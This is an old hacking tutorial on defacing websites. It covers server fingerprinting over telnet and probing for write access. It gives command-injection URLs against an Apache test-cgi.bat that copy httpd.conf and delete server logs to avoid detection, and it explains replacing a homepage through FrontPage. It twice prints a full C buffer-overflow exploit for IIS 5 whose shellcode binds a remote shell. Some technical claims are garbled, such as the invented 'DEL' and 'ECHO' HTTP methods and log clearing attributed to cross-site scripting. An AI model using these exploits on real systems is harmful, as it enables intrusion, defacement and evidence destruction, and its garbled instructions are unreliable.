_____________________________________________________________________________________ ___________________________________________ Defacing wbsites _____________________________________________________________________________________ ____________________________________________

Defacing Websites
Defacing websites is one of the most exciting in the IT (Information Technology) as well as in the Underground World (The Hackers World). Crackers, Script Kiddies and Uberhackers mount their path towards fame by defacing websites. Well, its not always for fame, websites are also defaced to spread message among public. There are many reasons for website defacement; I have seen hackers defacing websites juts for fun and amusement. Well, in this article, I will be explaining the involutions of website defacement. Basically, websites are defaced by exploiting the vulnerabilities in the web server and gaining root shell injecting malicious coded into the target page residing on the server. In this tutorial, I will be explaining how to exploit the known vulnerabilities. I will be explaining some methods of exploiting the most vulnerable Microsoft IIS server.

Web Server Detection

I think defacing websites, is not at all hacking. For defacing websites you have to search for exploits, programming skill and lot of time for trial and error. In every software, website and web server there exists some vulnerability (mistake in the mechanism of the program), by exploiting these vulnerabilities, one can get root (administrator privilege) access to the system or the server running the particular vulnerability. After applying this method, websites are defaced. You can find loads of recently discovered vulnerabilities in sites like:

www.securityfocus.com www.packetstormsecurity.com

These sites even offer the exploit code and the method of exploitation.

You can also discover new vulnerabilities in web servers and sites through web security scanner.

Tools of Trade

Nikto Security Scanner Stealth HTTP Security Scanner Acutenix Web Security Scanner

So, before defacing websites, you must know, which sever software is running by the target website. After finding the server software, you will look for vulnerabilities and exploits for the particular server software. So, finding the server software is very essential.

Web server detection is very easy and a very obvious method. Basically, what happens is that when a request is sent to a web server, it is forced to generate a 400 Bad Request message or a 200 OK message or even 404 Forbidden error message in raw mode, that is, through telnet. Actually, the web server responds with the corresponding message which contains its web server software as well as the server software version information. So, what we need to do is just telnet the web server or website into port 80 of a web server and send some request so that the server responds with a 400 bad request error message or a 200 OK message which will contain the server software and server software version information.

NOTE: Port 80 is the default HTTP port for web servers.

Microsoft Telnet>telnet www.hackingtheworld.ilitehost.com 80 GET \ HTTP/1.1\r\n\r\n Host:server-software <enter> <enter> <enter>

HTTP/1.1 403 Forbidden Date: Fri, 17 Mar 2006 13:00:20 GMT Server: Apache/1.3.22 (Win32) Connection: close Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>403 Forbidd en</TITLE> </HEAD><BODY> <H1>Forbidden</H1> You don't have permission to access / on this server.<P> <HR> <ADDRESS>Apache/1.3.22 Server at www.apache.org Port 80</ADD RESS>

</BODY></HTML>

Connection to host lost.

I have telnetted www.hackingtheworld.ilitehost.com into port 80, so, I get the above figure in my command prompt.

Okay, I hope you have figured out, what I mean. It is mere telnet response. Okay, I will tell you what to do; you have to telnet a web server or website into port 80.

NOTE: I have telnetted the domain name; you can telnet the IP address also.

So, after telnetting the web server name or the website \, you will get a blank screen. So, in the blank screen, type in some requests like GET \ HTTP/1.1\r\n\r\n then type something like Host:server-software then press <enter> quite a few times until you get the servers response. The server will respond with its software information

Examining the Web Server

If you are using Microsoft IIS (Internet Information service), then you must have noticed that the default installation contains the website root in C:\Inetpub\wwwroot. Basically, all the directories

of server softwares are called as virtual directories. Actually, in a web server, each virtual directory is provided with different type of permissions. Permissions like Read, Write, Execution of Scripts and Execution of Executable like Dll and server side pages like ASP, CGI etc. Now, I am going to describe the methods of analyzing the directory permission of a virtual directory residing in a web server.

READ ACCESS Whenever you visit a website through your web browser, you type in the domain name. Do you know what happens, when you type in the domain name? Actually, when you type in the domain name and press enter, you are connected to port 80 (HTTP port) of the IP address linked with the domain name. For Example You type in www.hackingtheworld.ilitehost.com in your web browsers address bar. The IP (Internet Protocol) address of this site is 72.29.65.4, so, as soon as you press enter, the URL (Uniform Resource Locator) is redirects the IP address to 72.29.65.4/index.html, index.php, index.asp, index.jsp or whatever the index page is configured in the web server. Now, once you press enter, you will be redirected to Hacking the Worlds official website. In the website, you will be able to read contents from its wwwroot. If the wwwroot directory contains ASP, PHP or JSP, then those server side pages are executed and HTML is generated and passed to the browser (client) by IIS (server) or any web server dynamically. When you are able to read a document from a given directory then it signals that the directory is readable. Normally, it has been seen that directories containing databases files are forbidden with read access for security reasons.

WRITE ACCESS I will explain HTTP protocol concisely, before going to Write Access. Well, HTTP is a component of TCP/IP stack. It was configured and formulated with the connotation of sharing files across the Internet. HTTP is the acronym of Hyper Text Transfer Protocol. The name itself indicates the description. Files can be

uploaded to the server and downloaded from the server through the HTTP protocol. NOTE: Files can be uploaded to the server and downloaded from the server through the HTTP protocol without the need of any type of authentication.

Well, this was technique was employed and executed years ago. Soon, computer enthusiaists realized that this kind of technique was a huge security threat. So, they developed new techniques to subdue the security threat. Nowadays, web servers are designed and configured as such to give write access to only selected virtual directories.

TIP: Try telnetting a web server and find out some good information about the server and its behavior.

Now, I am going to explain some commonly used commands supported by a web server.

GET: It is used to send requests for read access to a file residing on the server by the browser (client)

Microsoft Telnet>telnet www.hackingtheworld.ilitehost.com 80 Connected to www.hackingtheworld.ilitehost.com....... GET /index.html HTTP/1.1\r\n\r\n

Sidetrack: The HTML (Hyper text markup language) source code of index.html page occupying on the server will be regressed or if requested for ASP or PHP or any server side executable page, then the dynamically generated HTML page will be shown.

DEL: This is a command for deleting files on the web server. This command requires write access on the assigned virtual directory where the file is to be deleted.

Microsoft Telnet>telnet www.hackingtheworld.ilitehost.com 80 Connected to www.hackingtheworld.ilitehost.com...... del /index.html HTTP/1.1\r\n\r\n

Sidetrack: Most probably, you will get a 403 Forbidden Error, as it is quiet obvious that the wwwroot directory will never have a write access.

PUT: It is used to create files on the server; it necessitates write access on the particular virtual directory, where the file is to be created.

Microsoft Telnet>telnet www.hackingtheworld.ilitehost.com 80 Connected to www.hackingtheworld.ilitehost.com...... PUT /cc.txt HTTP/1.1\r\n\r\n

Sidetrack: Most probably, you will get a 403 Forbidden Error, as it is quiet obvious that the wwwroot directory will never have a write access.

ECHO: The publishing tool, it is the same command used in DOS (Disk Operating System) Batch Files. The output can be redirected.

Microsoft Telnet> www.hackingtheworld.ilitehost.com 80 Connected to www.hackingtheworld.ilitehost.com...... ECHO Site defaced by S.B. >> /index.html HTTP/1.1\r\n\r\n

TIP: S.B. is the acronym of my name Shubham Bhattacharya. When you are defacing a site you can also use acronyms of your name.

PROPFIND: Propfind is used as a request for directory surfing.

NOTE: In IIS server, it is used as an administrative tool for web server analysis.

Microsoft Telnet> www.hackingtheworld.ilitehost.com 80 Connected to www.hackingtheworld.ilitehost.com..... PROPFIND / HTTP/1.1 Host:iis-server Content-Length:0

Sidetrack: You will definitely get a 403 Forbidden Error, as it is quiet evident that the wwwroot will never have a write access.

Well, you must be wondering how you can test write access permission for a particular directory in IIS server.

To test the write access permission for a particular directory in IIS server, follow the steps given below:

- To test if write access permission is enabled for anonymous web clients, then telnet the web server or the website in port 80 and make the following request.

PUT /scripts/htw.asp HTTP/1.1 Host: iis-server Content-Length: 10 <enter><enter>

Once you make the following request, the server should respond with a 100 Continue Message.

HTTP/1.1 100 Continue Server: Microsoft-IIS/5.0 Date: Sun, 17 Feb 2006 10:53:00 GMT

On receiving the above, type 10 letters XXXXXXXXXX

HTTP/1.1 201 Created Server: Microsoft-IIS/5.0 Date: Sun, 17 Feb 2006 10:56:08 GMT Location: http://iis-server/dir/my_file.txt Content-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

If the server responds with this 201 Created response then the write permission is enabled.

EXECUTION ACCESS

Server side pages like ASP, PHP, JSP or DLL are used in highly advanced database driven dynamic websites, which dynamically generates the HTML and sends it to the client (web browser). These server side pages and other executables including DLL and EXE files needs execution perquisites in the virtual directory where they are kept.

NOTE: DLL, EXE etc need execution perquisites, they are kept in a single virtual directory.

DIRECTORY SURFING It has been often seen that web servers, to be more specific virtual directories of web servers, are configured as such to provide directory surfing access to all clients or special clients through proper authentications. Actually, directory browsing means that you can list the file and folders present in your virtual directory, just as you see in your standalone system. Well, most of the web server administrators turn off, this feature. But exploit codes can be used to get directory listing of the virtual directory.

EXPLOIT FOR DIRECTORY LISTING IN APACHE Well, if you are not familiar with apache, then let me give you a brief description. Apache is a server, in which you have to configure your web server using command and scripts. These scripts and commands are kept in httpd.conf file in c:\apache group\apache\conf folder default Apache installation on a distinctive windows system. This file contains all the settings of the web server and if we get our hands into this file, then we get to know all the settings of the web server, including the location of log files, directory permissions, write access, authentication levels etc.

So, now lets get on with the exploit. As we know that Apache is the most preferred web server. This web server has a .bat in its cgi-bin directory. This .bat file is named as test-cgi.bat. Actually, the motive of the .bat file is to test the privileges of cgi-bin directory.

NOTE: cgi-bin directory contains all the CGI and Perl scripts.

Well it is quiet obvious that cgi-bin virtual directory has execution permissions. These conditions are exploited to perform out pernicious attacks. The .bat file in Apache web server is called as execution of DOS (Disk Operating Systems). The DOS shell is spawned to it for execution. Now we can use | (pipe) character along with the batch file to execute commands on the remote server.

NOTE: If you dont know how to put the | (pipe) character, then dont worry. To put the pipe character press Alt+ \, the \ character is just beside your backspace key.

So, the attack URL will be like this:

http://www.target.com/cgi-bin/test-cgi.bat?|copy+..\conf\httpd. conf+..\htdocs\httpd.conf

Through the above URL, I have copied the httpd.conf file from the conf directory. The conf directory mostly, does not have read access to the Apache web root, that is, htdocs virtual folder. Now, we can easily download the httpd.conf file using the following URL:

http://target.com/httpd.conf

Since, it occupies in the Apache web root. Through this method, you will get the httpd.conf file and through the httpd.conf file you can get some worthful information about the web server.

Inspecting known vulnerabilities

Generally, websites are defaced and hacked using vulnerabilities related with the server software or the Operating System running the server software. Well, most of the hackers, deface websites using vulnerabilities. Please note, I am talking about hackers, not script kiddies, who deface websites using uncanny softwares. So, you must know what vulnerability is, well, if you dont know, then let me tell you all. Vulnerability is an existing flaw or defect in the software architecture, which allows a hacker or cracker to take control over the system or issue capricious system commands to the server. In every software or application or tool, vulnerabilities persist.

http://www.securityfocus.com http://www.packetstorm.org http://www.guininski.com http://www.insecure.org http://www.securiteam.com http://www.slashdot.org http://www.technotronic.com

The above sites contain latest vulnerabilities with exploit codes. Even if you are an elite or a professional, you will find the information useful.

Working with Exploits

Well, I must say, this is the most exciting part of this tutorial. Okay, so, www.victim.com is the target site. Well, through the above methods, I mean the methods I have explained earlier in the tutorial, through those methods, we have found out that the website is functioning in Microsoft IIS server software. So, it is time to find some vulnerability, I am using Acutenix Web Security Scanner to scan for vulnerabilities. You guys must know programming languages like Perl or Socket Programming or C, this is essential because through this you will be able to compile the exploits. So, once you get vulnerability, try exploiting it by executing it in your client (browser).

MICROSOFT FRONPAGE EXTENSION EXPLOIT

This is one of the methods for website defacement using Microsoft Web Publishing Wizard. Using this method one can deface Websites having FrontPage Server extensions. By using Microsoft Web Publishing Wizard one can replace FrontPage Server extension pages. Follow the steps given below, to execute the following exploit.

Telnet the Target website or web server in port 80

C:\Telnet www.victim.com 80 You will get a blank screen, type GET and continue pressing enter, till the web server responds to your requests.

GET <ENTER><ENTER>

NOTE: Web servers functioning in IIS server have FrontPage Extensions enabled by default.

So, After pressing enter, you will get the following

HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.0 Date: Thu, 17 Feb 2006 04:18:45 GMT Content-Type: text/html Content-Length: 87

Once, you get the HTTP Bad Request, you have search for the homepage. Most of the sites have the default homepage as:

http://www.victimserver.com/main.asp http://www.victimserver.com/index.html http://www.victimserver.com/index.htm http://www.victimserver.com/index.asp http://www.victimserver.com/main.htm http://www.victimserver.com/main.htm http://www.victimserver.com/default.htm http://www.victimserver.com/default.asp http://www.victimserver.com/default.html Keep assaying all possible FrontPage Extensions, unless the page loads. If the extension doesnt exist, then it will give a 404 Error. Let us say, you have got the homepage as www.victim.com/index.html, so design the page which you want upload or modify the homepage. Here the homepage is index.html, once you design the page or modify the page, save it as index.html.

Now, open Web Publishing Wizard, and follow the steps given below.

- Open Microsoft Web Publishing Wizard

- Now, browse the file that you are going to upload. Here, index.html is the file, which we are going to upload.

- Now, you get a screen, where you have to name the web server. Type in anything and click on Advanced.

- Select the service provider from the drop down box. This is nothing but the kind of uploading it is going to do. Since, your motive is to deface the site, select the "FrontPage Extended Web" option since, this method of defacing works only for FrontPage enabled sites.

- Type the URL of the victim server homepage and in the given box, here it is www.victim.com/index.html . - Here specify the URL that you type in the Web browser to access the victim server website. - Select the connection method that you use to access the internet. - Click "Finish", Voila, you have successfully, replaced the victims homepage with yours.

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities, you must know some coding exploits. I am going to present some exploit codes, written in the most powerful programming language C.

/* Windows 2000 Server Exploit By CHINANSL Security Team. Test on Windows 2000 Chinese Version, IIS 5.0 , not patched. Warning:THIS PROGRAM WILL ONLY TEST. CHINANSL Technology CO.,LTD http://www.chinansl.com keji@chinansl.com

use MS VC++ to compile this piece of code */

#include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[]) { if(argc != 4) { printf("%s ip port aspfilepath\n\n",argv[0]); printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n",argv[0]); puts(" programed by keji@chinansl.com");

return 0; }

DWORD srcdata=0x01e2fb1c-4;//0x00457474; //address of SHELLCODE DWORD jmpaddr=0x00457494; //0x77ebf094;/ /0x01e6fcec; //"\x1c\xfb\xe6\x01"; //"\x0c\xfb\xe6\x01";

char* destIP=argv[1]; char* destFile=argv[3]; int webport=atoi(argv[2]); char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP"; //16 bytes

WSADATA ws; SOCKET s; long result=0; if(WSAStartup(0x0101,&ws) != 0) { puts("WSAStartup() error"); return -1; }

struct sockaddr_in addr; addr.sin_family=AF_INET; addr.sin_port=htons(webport); addr.sin_addr.s_addr=inet_addr(destIP); s=socket(AF_INET,SOCK_STREAM,0); if(s==-1) { puts("Socket create error"); return -1; }

if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1) { puts("Cannot connect to the specified host"); return -1; }

char buff[4096]; char* shellcode="\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x8 9" "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"

"\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab" "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f" "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89" "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0" "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89" "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe" "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56" "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc" "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89" "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89" "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89" "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a" "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3" "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45" "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8" "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a" "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32" "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0" "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0" "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55" "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10" "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff" "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33" "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55" "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50" "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0" "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47" "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c" "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff" "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"

"\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89" "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50" "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85" "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53" "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d" "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff" "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90" "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0" "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8" "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85" "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff" "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4" "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a" "\xff\xff\x95\x18\xff\xff\xff";

char* s1="POST ";// HTTP/1.1\r\n"; char* s2="Accept: */*\r\n"; char* s4="Content-Type: application/x-wwwform-urlencoded\r\n"; char* s5="Transfer-Encoding: chunked\r\n\r\n"; char* sc="0\r\n\r\n\r\n";

char shellcodebuff[1024*8]; memset(shellcodebuff,0x90,sizeof (shellcodebuff)); memcpy(&shellcodebuff[sizeof(shellcodebuff)strlen(shellcode)-1],shellcode,strlen(shellcode)); shellcodebuff[sizeof(shellcodebuff)-1] = 0;

char sendbuff[1024*16]; memset(sendbuff,0,1024*16);

sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s", s1, destFile, shellcodebuff, s2, destIP, s4,s 5, pad/*,srcdata,jmpaddr*/, sc);

int sendlen=strlen(sendbuff); *(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr; *(DWORD *)strstr(sendbuff,"AAAA") = srcdata;

result=send(s,sendbuff,sendlen,0); if(result == -1 ) { puts("Send shellcode error!"); return -1; }

memset(buff,0,4096); result=recv(s,buff,sizeof(buff),0);

if(strstr(buff,"<html>") != NULL) { shutdown(s,0); closesocket(s);

puts("Send shellcode error!Try again!"); return -1;

shutdown(s,0); closesocket(s); printf("\nUse <telnet %s 1111> to connect to the host\n",destIP); puts("If you cannot connect to the host,try run this program again!");

return 0; }

The above code is called as an exploit code; these are written in powerful programming languages like C, Perl or sometimes JAVA. Exploit Codes, are written according to the vulnerability. Vulnerabilities were discovered in the past, nowadays, it has been seen that server softwares and operating systems are patched for these vulnerabilities. So, you cant just execute exploit code to break into a server, you must overwork an exploit code, so that it works according to your needs. One more thing, I must mention is that you must keep yourself updated with latest vulnerabilities by visiting the sites that I have mentioned earlier in the tutorial. Well, I think its better that you code your own exploit code, in Perl or C, in order to break into websites.

NOTE: I am talking about high profile websites; I am not talking about lame websites, coded in notepad.

Keeping yourself safe

Well, you must be familiar with server softwares like Apache, Microsoft IIS etc. So, you must be knowing about the log files, which records each and every request made by the server. As it records everything, system administrators, will have no problem catching the malicious cracker or script kiddie, as the log file will have the IP (Internet Protocol) address, and through the IP address, you can trace the cracker or the script kiddie. NOTE: Read my tutorial on Gathering Information of Remote Host. TIP: If you do not want to get busted, you must clear the log files after you break into a web server.

CLEARING LOGS You must clear youre the logs, in order to save yourself from getting busted. So, you can use cross site scripting vulnerability, to clear the log files. You can do by executing the following URL:

http://www.target.com/cgi-bin/test-cgi.bat?|/DEL+..\log\*.*

NOTE: The above URL can be used in Apache server software.

In case of IIS on Windows 2000 you can use the following method to get a DOS Shell through telnet.

The Following code exploits a buffer overflow in IIS 5 on Windows 2000 server and opens port 1111 and binds a shell to it. If the exploit is successful then all you have to do is use telnet to connect to port 1111 of target and the system is yours.

/* Windows 2000 Server Exploit By CHINANSL Security Team.

Test on Windows 2000 Chinese Version, IIS 5.0 , not patched. Warning:THIS PROGRAM WILL ONLY TEST. CHINANSL Technology CO.,LTD http://www.chinansl.com keji@chinansl.com */

#include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[]) { if(argc != 4) { printf("%s ip port aspfilepath\n\n",argv[0]); printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n",argv[0]); puts(" programed by keji@chinansl.com");

return 0; }

DWORD srcdata=0x01e2fb1c-4;//0x00457474; //address of SHELLCODE DWORD jmpaddr=0x00457494; //0x77ebf094;/ /0x01e6fcec; //"\x1c\xfb\xe6\x01"; //"\x0c\xfb\xe6\x01";

char* destIP=argv[1]; char* destFile=argv[3];

int webport=atoi(argv[2]); char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP"; //16 bytes

WSADATA ws; SOCKET s; long result=0; if(WSAStartup(0x0101,&ws) != 0) { puts("WSAStartup() error"); return -1; }

struct sockaddr_in addr; addr.sin_family=AF_INET; addr.sin_port=htons(webport); addr.sin_addr.s_addr=inet_addr(destIP); s=socket(AF_INET,SOCK_STREAM,0); if(s==-1) { puts("Socket create error"); return -1; }

if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1) { puts("Cannot connect to the specified host"); return -1; }

char buff[4096];

char* shellcode="\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x8 9" "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32" "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab" "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f" "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89" "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0" "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89" "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe" "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56" "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc" "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89" "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89" "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89" "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a" "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3" "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45" "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8" "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a" "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32" "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0" "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0" "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55" "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10" "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff" "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33" "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55" "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50" "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0" "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"

"\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c" "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff" "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff" "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89" "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50" "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85" "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53" "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d" "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff" "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90" "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0" "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8" "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85" "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff" "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4" "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a" "\xff\xff\x95\x18\xff\xff\xff";

char* s1="POST ";// HTTP/1.1\r\n"; char* s2="Accept: */*\r\n"; char* s4="Content-Type: application/x-wwwform-urlencoded\r\n"; char* s5="Transfer-Encoding: chunked\r\n\r\n"; char* sc="0\r\n\r\n\r\n";

char shellcodebuff[1024*8]; memset(shellcodebuff,0x90,sizeof (shellcodebuff));

memcpy(&shellcodebuff[sizeof(shellcodebuff)strlen(shellcode)-1],shellcode,strlen(shellcode)); shellcodebuff[sizeof(shellcodebuff)-1] = 0;

char sendbuff[1024*16]; memset(sendbuff,0,1024*16);

sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s", s1, destFile, shellcodebuff, s2, destIP, s4,s 5, pad/*,srcdata,jmpaddr*/, sc);

int sendlen=strlen(sendbuff); *(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr; *(DWORD *)strstr(sendbuff,"AAAA") = srcdata;

result=send(s,sendbuff,sendlen,0); if(result == -1 ) { puts("Send shellcode error!"); return -1; }

memset(buff,0,4096); result=recv(s,buff,sizeof(buff),0);

if(strstr(buff,"<html>") != NULL) { shutdown(s,0); closesocket(s);

puts("Send shellcode error!Try again!"); return -1; }

shutdown(s,0); closesocket(s); printf("\nUse <telnet %s 1111> to connect to the host\n",destIP); puts("If you cannot connect to the host,try run this program again!");

return 0; }

IMPLEMENTATION OF THE CODE

